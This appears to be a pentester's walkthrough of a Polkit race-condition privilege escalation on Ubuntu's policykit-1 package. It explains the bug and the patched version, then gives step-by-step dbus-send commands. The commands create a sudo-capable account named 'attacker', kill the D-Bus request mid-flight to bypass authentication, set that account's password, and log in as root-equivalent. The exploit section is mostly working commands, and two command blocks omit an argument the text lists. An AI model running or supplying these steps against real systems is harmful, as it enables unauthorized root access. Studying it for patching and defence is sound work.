This bug is a combination of a race condition and bad error handling. Basically:

  • Manually request an action that requires superuser access via DBus.
  • Kill dbus-daemon after Polkit has received the message but before it responds (there’s the race).
  • Polkit requests the user ID associated with the message, but since DBus has restarted it can’t reference the original message ID and responds with an error.
  • Polkit mishandles the error, substituting 0 for the ID of the requesting user (there’s the botched error handling).
  • Because the requesting user ID now appears to be root, Polkit just goes ahead and takes the action without issuing a challenge.

Ubuntu fixed with with version 0.105-26ubuntu1.1 of the policykit-1 package (the last vulnerable version was 0.105-26ubuntu1).

  1. Construct a message similar to the following:

    dbus-send \
    	--system \
    	--dest=org.freedesktop.Accounts \
    	--type=method_call \
    	--print-reply /org/freedesktop/Accounts \
    	              org.freedesktop.Accounts.CreateUser \
    	              string:attacker \
    	              string:"Pentester Account" \

    The three parameters are:

    • string:attacker — the name of the user to create.
    • string:"Pentester Account" — the user “description” (GECOS field).
    • int32:1 — grant sudo access to the user.
  2. Begin by determining how long the message takes to execute on the target. This can be done with the time command.

    time dbus-send \
    	--system \
    	--dest=org.freedesktop.Accounts \
    	--type=method_call \
    	--print-reply /org/freedesktop/Accounts \
    	              org.freedesktop.Accounts.CreateUser \
    	              string:attacker \
    	              string:"Pentester Account" \
  3. DBus needs to be killed approximately halfway through this execution period. We cannot wait for the application to return, so instead we background it.

    dbus-send \
    	--system \
    	--dest=org.freedesktop.Accounts \
    	--type=method_call \
    	--print-reply /org/freedesktop/Accounts \
    	              org.freedesktop.Accounts.CreateUser \
    	              string:attacker \
    	              string:"Pentester Account" \
    	              int32:1 & \
    sleep ${TIME}s; kill $!

    Here $TIME is approximately half the time measured in the previous step.

  4. ID the created user.

    id attacker
  5. Create a new password hash for the user.

    openssl passwd -6 $PASSWORD
  6. Pull the same trick as in step 3, but with setting the created user’s password.

    dbus-send \
    	--system \
    	--dest=org.freedesktop.Accounts \
    	--type=method_call \
    	--print-reply /org/freedesktop/Accounts/User$UID \
    	              org.freedesktop.Accounts.User.SetPassword \
    	              string:'$PASSWORD_HASH' \
    	              string:'Ask the pentester' & \
    sleep ${TIME}s; kill $!

    Here $UID is the user ID retrieved in step 4 (note that there’s no space between User and the ID, so you’ll be hitting an endpoint that looks something like /org/freedesktop/Accounts/User1003), $PASSWORD_HASH is the hash returned in step 5, and $TIME is the same timing determined from step 3. The second string being passed in the user password hint.

  7. Log in as the new user (probably via su).